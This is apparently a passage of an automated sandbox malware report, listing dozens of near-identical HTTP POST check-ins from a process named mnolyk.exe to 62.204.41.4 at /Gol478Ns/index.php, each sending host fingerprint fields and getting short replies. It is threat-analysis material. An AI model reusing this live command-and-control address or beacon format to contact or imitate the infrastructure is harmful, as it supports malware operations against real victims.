                                                                      50 | 192.168.2.7 | 49745 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:13.690917015 CET | 165 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.755095959 CET | 165 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      500 | 192.168.2.7 | 50195 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:16.860331059 CET | 615 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.925700903 CET | 615 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      501 | 192.168.2.7 | 50196 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:17.107942104 CET | 616 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.171992064 CET | 616 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      502 | 192.168.2.7 | 50197 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:17.360534906 CET | 617 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.425403118 CET | 617 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      503 | 192.168.2.7 | 50198 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:17.611552000 CET | 618 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.678493023 CET | 618 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      504 | 192.168.2.7 | 50199 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:17.854664087 CET | 619 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.918106079 CET | 619 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      505 | 192.168.2.7 | 50200 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:18.098931074 CET | 620 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.165523052 CET | 620 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      506 | 192.168.2.7 | 50201 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:18.336544037 CET | 621 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.399946928 CET | 621 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      507 | 192.168.2.7 | 50202 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:18.573599100 CET | 622 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.637898922 CET | 622 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      508 | 192.168.2.7 | 50203 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:18.814518929 CET | 623 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.880453110 CET | 623 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      509 | 192.168.2.7 | 50204 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:19.062252998 CET | 624 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.134325981 CET | 624 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      51 | 192.168.2.7 | 49746 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:13.923683882 CET | 166 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.987709045 CET | 166 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      510 | 192.168.2.7 | 50205 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:19.325526953 CET | 625 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.390074968 CET | 625 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      511 | 192.168.2.7 | 50206 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:19.556588888 CET | 626 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.621167898 CET | 626 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      512 | 192.168.2.7 | 50207 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:19.807801962 CET | 627 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.874517918 CET | 627 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      513 | 192.168.2.7 | 50208 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:20.046231031 CET | 628 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.115149975 CET | 628 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      514 | 192.168.2.7 | 50209 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:20.298654079 CET | 629 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.363478899 CET | 629 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      515 | 192.168.2.7 | 50210 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:20.545993090 CET | 630 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.609539986 CET | 630 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      516 | 192.168.2.7 | 50211 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:20.794111013 CET | 631 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.859153032 CET | 631 | IN | HTTP/1.1 200 OK
